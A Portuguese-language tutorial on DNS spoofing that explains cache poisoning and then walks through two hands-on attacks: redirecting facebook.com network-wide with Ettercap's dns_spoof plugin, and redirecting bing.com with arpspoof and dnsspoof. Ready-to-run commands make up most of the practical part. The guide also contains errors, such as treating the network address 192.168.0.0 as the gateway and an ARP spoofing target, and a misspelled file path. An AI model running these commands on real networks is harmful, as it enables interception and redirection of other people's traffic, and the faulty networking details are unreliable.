DNS Spoofing

DNS Spoofing ToC

DNS Spoofing
Realizando Ataque DNS Spoofing Com Ettercap
Realizadando DNS Spoof em rede local com arpspoof e dnsspoof

DNS Spoofing

O DNS tem uma serie de vulnerabilidades que podem ser utilizadas por um invasor. Um invasor pode obter acesso ao servidor DNS de uma organização e alterar os mapas deste de forma que o seu computador passe a possuir o nome de um computador desta organização que possui relação de confiança com o computador alvo.
Um invasor pode corromper o servidor DNS de uma organização fazendo que ele responda com o IP de seu servidor WWW quando os usuários da instituição desejavam o IP daquele banco que permite movimentar a conta via rede.
Versões mais antigas de servidores DNS permitem que o seu cache seja corrompido remotamente com os mesmos objetivos e resultados finais.
Dns Spoofing (ou envenenamento de cache DNS) é um ataque, no qual os dados são introduzidos em um Sistema de Nomes de Dominio (DNS) do banco de dados cache dos nomes do servidor, fazendo com que o nome do servidor redirecione para o endereço IP incorreto, desviando o tráfego para outro computador ou site (muitas vezes o do atacante).
Normalmente, um computador em rede utiliza um servidor DNS fornecido pela organização do usuário de computador ou um provedor de serviços de Internet (ISP). Os servidores DNS são geralmente implantados na rede de uma organização para melhorar o desempenho de resposta do cache dos resultados da consulta anteriormente obtidos. Ataques de envenenamento em um único servidor DNS pode afetar os usuários atendidos diretamente pelo servidor comprometido ou indiretamente pelo seu servidor downstream (s), se aplicável.
Para executar um ataque de envenenamento de cache, o invasor explora uma falha no software DNS. Se o servidor não está validando corretamente respostas DNS para garantir que eles são de uma fonte autorizada (por exemplo, utilizando DNSSEC), o servidor vai acabar em cache, e liberando as entradas incorretas no servidor local e servi-los a outros usuários que fazem o mesmo pedido.

Realizando Ataque DNS Spoofing Com Ettercap

No ataque de dns spoofing utilizando o Ettercap o atacante pode determinar para qual lugar o usuário vai ser redirecionado quando acessa um determinado domínio.
Primeiramente edite o arquivo etter.dns de acordo com sua necessidade, no nosso caso iremos usar o domínio do facebook como alvo, e iremos colocar o ip do google como exemplo.
```
# vim
/usr/local/share/ettercape/etter.dns

facebook.com A 8.8.8.8

www.facebook.com A 8.8.8.8
```

facebook.com : Domínio alvo, quando o cliente acessar esse domínio ele será redirecionado para outro lugar.

A : Tipo de redirecionamento de DNS.

8.8.8.8 : IP do site para onde o cliente será redirecionado.

Execução:

# ettercap -T -q -M arp -i eth0 -P dns_spoof //

ettercap: Comando da ferramenta utilizada.

-T: Utiliza modo texto.

-q: Seta o modo silencioso.

-M arp: Tipo de redirecionamento.

-i eth0: Interface de rede.

-P dns_spoof: Plugin utilizado para o ataque.

// : Seleciona toda rede.

Agora em algum host da rede acesse o site facebook.com para fazer o teste, veja que você será redirecionado para o ip do google que informamos no arquivo etter.dns, é importante lembrar que se tiver alguma proteção contra spoof na rede esse ataque não ira funcionar, quando um cliente acessa o domínio alvo ira aparecer na tela do atacante.

Realizadando DNS Spoof em rede local com arpspoof e dnsspoof

Primeiramente, abra uma shell. Veja aqui, a sintaxe do comando que você irá rodar:
```
arpspoof -i [interface] -t [alvo] host
```

Puxe os dados da sua rede local(ifconfig/ipconfig):

Gateway: 192.168.0.0
    IP do Roteador: 192.168.0.1
    Interface de Rede em uso: eth0

Execute então o seguinte:

arpspoof -i eth0 -t 192.168.0.1 192.168.0.0

192.168.0.1 - Endereço de nosso roteador.

192.168.0.0 - Nosso Gateway de rede.

Mas porque o gatway? Pois o Gatway é usado em todos os computadores de sua rede (sendo sempre o mesmo), assim, seu ataque funcionará na rede toda.
Dê enter, e abra outra aba do terminal, e digite a mesma coisa, mas agora, você irá inverter a ordem dos endereços IP's. O router agora é o host, e a vítima é o Gateway.
```
arpspoof -i eth0 -t 192.168.0.0 192.168.0.1
```
Feito isso, você irá criar um arquivo, com as configurações de seu spoof. Suponhamos que eu quero fazer com que a vítima, ao entrar em bing.com, seja redirecionado para google.com. Para isso, preciso somente pegar o IP do google.com:
```
173.194.42.7 bing*
    173.194.42.7 www.bing.*
    173.194.42.7 *bing.com
```
Com o arquivo já salvo, os outros dois comandos rodando, vamos ao spoof propriamente dito. Abra uma nova shell, e digite:
```
dnsspoof -i eth0 -f nome_arquivo
```

-i eth0 - A interface de rede. -i é o parâmetro. Se você estiver usando wireless: -i wlan0...

-f nome_arquivo - Substitua nome_arquivo pelo nome do arquivo criado com as conf's de seu spoof.

[MENU]